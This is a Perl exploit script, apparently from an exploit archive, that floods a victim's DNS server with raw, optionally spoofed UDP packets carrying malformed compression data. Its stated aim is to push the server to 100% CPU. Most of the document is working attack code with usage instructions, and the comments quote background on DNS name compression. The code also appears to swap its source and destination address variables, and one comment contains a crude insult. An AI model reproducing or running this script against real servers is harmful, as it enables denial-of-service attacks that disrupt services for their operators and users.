DNS Invalid Compression Denial Of Service

`#!/usr/bin/perl  
#  
# DNS Invalid Compression attack coded by sipher (www.elitter.net)  
#  
# History:  
# elitter.net provides Free UNIX shells and receives its more than fair  
amount of DDoS's and DoS  
# attacks. 1 lovely day someone targeted our DNS services and managed to  
bring the system to 100%  
# CPU usage.  
#  
# Goal:  
#  
# Reproduce following error message, hopefully get the same results of 100%  
CPU usage.  
#  
# Error output:  
#  
# Jul 9 19:36:30 42262 mydns[26545]: 09-Jul-2011 19:36:30+359454 #24949  
12337 UDP 202.164.36.27 000 000  
# FORMERR Invalid_compression_method 13365 0 0 0 LOG N 006 ""  
#  
# Here is a sample of the packet (tcpdump -lnx port 53):  
#  
# 4500 002b 512f 4000 3411 92a9 2989 601e  
# cc2d 0d15 e483 0035 0017 e98c 3031 3233  
# 3435 3637 3839 4142 4344 4500 0000  
#  
# So next time you decide to attack someone. You might just squash your bug.  
#  
# Testbed:  
# isc.org,dbjdns  
#  
# DNS packets use an ad-hoc compression method in which portions of domain  
names can sometimes be replaced with two-byte pointers to previous domain  
names.  
# The precise rule is that a name can be compressed if it is a response  
owner name, the name in NS data, the name in CNAME data, the name in PTR  
data,  
# the name in MX data, or one of the names in SOA data.  
# One problem with DNS compression is the amount of code required to parse  
it. Reliably locating all these names takes quite a bit of work that  
# would otherwise have been unnecessary for a DNS cache. LZ77 compression  
would have been much easier to implement.  
#  
# Another problem with DNS compression is the amount of code required to  
correctly generate it. (RFC 1035 allowed servers to not bother compressing  
# their responses; however, caches have to implement compression,so that  
address lists from some well-known sites don't burst the seams of a DNS UDP  
packet.)  
# Not only does the compressor need to figure out which names can be  
compressed, but it also needs to keep track of compression targets earlier  
in the packet.  
# RFC 1035 doesn't make clear exactly what targets are allowed.  
# (Most versions of BIND do not use pointers except to compressible names;  
suffixes of the query name are excluded. dnscache uses pointers to suffixes  
of the query name.)  
#  
# -djb  
#  
# Shouts: burnout, hightech, spithash, pookie, #[email protected]  
#  
  
# http://www.hsc.fr/ressources/outils/rawsock/index.html.en  
use Net::RawSock;  
  
if($#ARGV != 2) {  
print "--> DNS Invalid compression attack (www.elitter.net)\n";  
print "--> NOTE: Most ISP block spoofed UDP packets. Enter a valid  
source address.\n";  
print "./compdns.pl < source address > < IP of victim > < # of  
packets >\n";  
exit(0);  
}  
  
print "--> DNS Invalid compress attack\n";  
$count = 1;  
$sourceaddy = $ARGV[0];  
$target = $ARGV[1];  
$numpkt = $ARGV[2];  
  
$dst_host = (gethostbyname($sourceaddy))[4];  
$src_host = (gethostbyname($target))[4];  
  
$dst_host = pack('a4', $dst_host);  
$src_host = pack('a4', $src_host);  
  
while ($count <= $numpkt) {  
  
print "--> [$count]: ($sourceaddy)->($target)\n";  
  
  
my $pkt =  
"\x45\x00\x00\x2b\x00\x00\x40\x00\x34\x11\x92\xa9".  
# destination address  
# Example: "\x43\x9f\x27\x94".  
"$dst_host".  
# source address  
# Example: "\xcc\x2d\x0d\x12".  
"$src_host".  
# source port  
"\xe4\x83".  
# destination port  
"\x00\x35".  
# length  
"\x00\x17".  
# checksum null whore  
"\x00\x00".  
# data = junk  
  
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00".  
  
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00".  
  
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00";  
  
  
Net::RawSock::write_ip($pkt);  
$count++;  
}  
  
print "--> Done.\n";  
`